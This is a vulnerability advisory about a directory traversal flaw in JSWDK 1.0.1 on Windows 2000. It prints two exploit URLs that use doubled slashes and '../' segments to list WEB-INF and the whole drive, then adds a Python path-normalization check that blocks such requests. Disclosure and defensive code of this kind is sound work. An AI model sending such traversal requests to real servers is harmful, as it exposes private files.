COMMAND

    JSWDK

SYSTEMS AFFECTED

    JavaServer Web Dev Kit (JSWDK) 1.0.1 for Windows 2000

PROBLEM

    The following is based on CHINANSL Security Advisory CSA-200106.
    A security vulnerability has been found in Windows NT/2000 systems
    that have JSWDK 1.0.1 installed.  The vulnerability allows remote
    attackers to access files outside the document root directory.

    Exploits:

        http://localhost:8080/examples//WEB-INF/

    lists the contents of the /WEB-INF/ directory.

        http://localhost:8080/../examples//WEB-INF/../../../../../

    If JSWDK is installed in c:\, this request lists all files and
    directories in c:\.
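
    The check a server or filtering proxy needs before mapping a request
    path to disk, as an added example (not code from JSWDK or from the
    advisory). The function name resolve and the third sample path are
    assumptions made for illustration; the first two paths are taken from
    the URLs above.

```python
from urllib.parse import unquote

# Directory names that must never be served. Compared in lower case because
# file names on Windows NT/2000 are case-insensitive.
PROTECTED = {"web-inf"}


def resolve(request_path):
    """Normalize a request path and classify it.

    Returns (verdict, normalized_path) where verdict is one of:
      "traversal" - a ".." segment climbs above the document root
      "protected" - the normalized path enters a protected directory
      "ok"        - safe to map below the document root
    """
    # Drop any query string, decode %xx escapes once, and treat "\" like "/"
    # because the file system behind the server is Windows.
    path = unquote(request_path.split("?", 1)[0]).replace("\\", "/")

    stack = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue  # collapses "//" so "examples//WEB-INF" == "examples/WEB-INF"
        if segment == "..":
            if not stack:
                return "traversal", None  # would leave the document root
            stack.pop()
            continue
        stack.append(segment)

    normalized = "/" + "/".join(stack)
    # Match on the normalized segments, not on the raw string the client sent.
    if any(s.lower() in PROTECTED for s in stack):
        return "protected", normalized
    return "ok", normalized


if __name__ == "__main__":
    samples = [
        "/examples//WEB-INF/",                    # from the advisory
        "/../examples//WEB-INF/../../../../../",  # from the advisory
        "/examples/index.html",                   # constructed benign request
    ]
    for p in samples:
        print(p, "->", resolve(p))
```

    Both the directory check and the root check run on the normalized
    segment list, so a doubled slash or a leading ".." cannot slip past a
    comparison made against the raw request string.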

SOLUTION

    Update JSWDK.